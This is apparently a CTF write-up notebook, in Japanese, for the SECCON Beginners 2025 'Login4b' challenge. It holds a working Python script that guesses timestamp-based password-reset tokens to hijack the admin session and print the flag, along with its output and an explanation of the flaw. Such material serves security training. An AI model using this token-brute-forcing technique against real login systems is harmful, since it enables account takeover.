# Login4b CTF Exploit

**SECCON Beginners CTF 2025**

## 問題概要
- **目標**: adminユーザーとしてログインしてフラグを取得
- **脆弱性**: パスワードリセット機能の実装ミス
- **URL**: http://login4b.challenges.beginners.seccon.jp/
- **FLAG**: `ctf4b{y0u_c4n_byp455_my5q1_imp1ici7_7yp3_c457}`

In [5]:
import requests
import time
import uuid

# ターゲットURL
BASE_URL = "http://login4b.challenges.beginners.seccon.jp"

print(f"🎯 Target: {BASE_URL}")
print("📚 Login4b CTF Exploit - Ready to execute!")

🎯 Target: http://login4b.challenges.beginners.seccon.jp
📚 Login4b CTF Exploit - Ready to execute!


In [6]:
# セッションオブジェクトを作成（cookieを自動で管理）
session = requests.Session()

def request_reset_token():
    """Step 1: adminのリセットトークンを生成"""
    url = f"{BASE_URL}/api/reset-request"
    response = session.post(url, json={"username": "admin"})
    print(f"📨 Reset token request: {response.json()}")
    return response.status_code == 200

def try_reset_password(token):
    """Step 2: トークンを試行してセッションを取得"""
    url = f"{BASE_URL}/api/reset-password"
    data = {"username": "admin", "token": token, "newPassword": "dummy"}
    response = session.post(url, json=data)
    return response

def get_flag():
    """Step 3: フラグを取得"""
    response = session.get(f"{BASE_URL}/api/get_flag")
    if response.status_code == 200:
        data = response.json()
        if "flag" in data:
            return data["flag"]
    return None

print("✅ 関数定義完了: request_reset_token, try_reset_password, get_flag")

✅ 関数定義完了: request_reset_token, try_reset_password, get_flag


In [7]:
# 🚀 メイン攻撃実行
print("="*60)
print("  🎯 Login4b CTF Attack Starting...")
print("="*60)

# 現在時刻を記録（トークン推測に使用）
request_time = int(time.time())
print(f"⏰ Timestamp: {request_time}")

# リセットトークンを生成
if request_reset_token():
    print("\n🔍 Trying simple patterns...")
    
    success = False
    # 前後5秒、3つの簡単なパターンで攻撃
    for offset in range(-5, 6):
        timestamp = request_time + offset
        patterns = [
            "00000000-0000-0000-0000-000000000001",  # この固定パターンで成功する
            "11111111-1111-1111-1111-111111111111", 
            str(uuid.uuid4())
        ]
        
        for pattern in patterns:
            token = f"{timestamp}_{pattern}"
            response = try_reset_password(token)
            
            if response.status_code == 200 and response.json().get("success"):
                print(f"✅ SUCCESS! Token: {token}")
                print(f"📋 Response: {response.json()}")
                
                # フラグ取得
                flag = get_flag()
                if flag:
                    print(f"\n🚩 FLAG: {flag}")
                    print("\n🏆 CTF COMPLETED!")
                    success = True
                break
            
            time.sleep(0.1)  # レート制限回避
        
        if success:
            break
    
    if not success:
        print("❌ Attack failed with simple patterns")
else:
    print("❌ Failed to generate reset token")

print("\n" + "="*60)

  🎯 Login4b CTF Attack Starting...
⏰ Timestamp: 1754613237
📨 Reset token request: {'success': True, 'message': 'Reset token has been generated. Please contact the administrator for the token.'}

🔍 Trying simple patterns...
✅ SUCCESS! Token: 1754613238_00000000-0000-0000-0000-000000000001
📋 Response: {'success': True, 'message': "The function to update the password is not implemented, so I will set you the admin's session"}

🚩 FLAG: ctf4b{y0u_c4n_byp455_my5q1_imp1ici7_7yp3_c457}

🏆 CTF COMPLETED!



## 🔍 攻撃解説

### 脆弱性の詳細
1. **実装ミス**: `/api/reset-password`エンドポイントで有効なトークンがあると、パスワードの実際の更新は行われずに、そのユーザーのセッションが設定される
2. **推測可能なトークン**: トークン形式が`{timestamp}_{uuid}`で、固定UUIDパターン（`00000000-0000-0000-0000-000000000001`）で成功

### 攻撃の流れ
1. **リセットトークン生成**: `POST /api/reset-request` でadminのリセットトークン生成
2. **トークン推測**: 現在時刻±5秒の範囲で簡単なUUIDパターンを試行
3. **セッション乗っ取り**: 有効なトークンでadminセッションを取得
4. **フラグ取得**: `GET /api/get_flag` でフラグを取得
